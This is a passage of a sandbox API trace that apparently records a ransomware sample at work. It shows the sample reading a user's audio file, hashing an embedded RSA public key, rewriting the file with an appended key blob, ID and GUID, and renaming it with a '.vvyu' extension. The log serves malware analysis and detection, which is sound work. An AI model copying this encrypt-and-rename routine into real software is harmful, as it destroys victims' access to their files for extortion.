[0198.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0198.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.017] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.017] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x25d9, lpOverlapped=0x0) returned 1 [0198.018] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0198.018] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.018] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.018] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0198.020] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0198.020] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.020] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0198.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0198.020] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0198.020] GetLastError () returned 0x0 [0198.020] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0198.020] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0198.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.020] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0198.021] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0198.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.021] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0198.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0198.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25e0) returned 0x2af5168 [0198.021] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0198.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0198.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0198.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea9b0 [0198.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6818 [0198.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea9f8 [0198.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6830 [0198.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6860 [0198.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68c0 [0198.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6878 [0198.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0198.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0198.022] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0198.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0198.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0198.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0198.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0198.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0198.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68c0 [0198.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0198.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6878 [0198.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0198.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6860 [0198.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0198.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0198.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0198.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0198.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0198.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0198.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0198.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0198.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0198.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0198.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0198.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0198.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0198.027] GetCurrentThreadId () returned 0x5d8 [0198.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0198.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af2d20 [0198.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0198.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0198.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0198.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0198.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.028] GetCurrentThreadId () returned 0x5d8 [0198.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0198.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0198.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68c0 [0198.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6860 [0198.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0198.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6878 [0198.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0198.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0198.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6848 [0198.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0198.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68d8 [0198.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0198.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68a8 [0198.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6890 [0198.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68f0 [0198.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0198.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6890 [0198.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0198.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0198.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0198.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0198.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0198.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6860 [0198.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0198.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0198.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0198.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0198.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0198.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0198.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0198.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6860 | out: hHeap=0x2c0000) returned 1 [0198.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0198.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0198.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0198.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0198.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0198.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0198.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0198.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0198.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0198.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0198.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0198.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0198.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0198.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6848 | out: hHeap=0x2c0000) returned 1 [0198.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0198.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0198.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6830 | out: hHeap=0x2c0000) returned 1 [0198.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea9f8 | out: hHeap=0x2c0000) returned 1 [0198.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0198.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0198.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0198.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0198.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.040] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x25d4, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x25d4, lpOverlapped=0x0) returned 1 [0198.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0198.041] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x25d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.041] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0198.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0198.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0198.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.043] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0198.043] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.043] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.043] CloseHandle (hObject=0x584) returned 1 [0198.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0198.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0198.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0198.045] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\0VhP5.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\zntr-yrixj\\0vhp5.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\0VhP5.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\zntr-yrixj\\0vhp5.wav.vvyu")) returned 1 [0198.048] HeapFree (in: 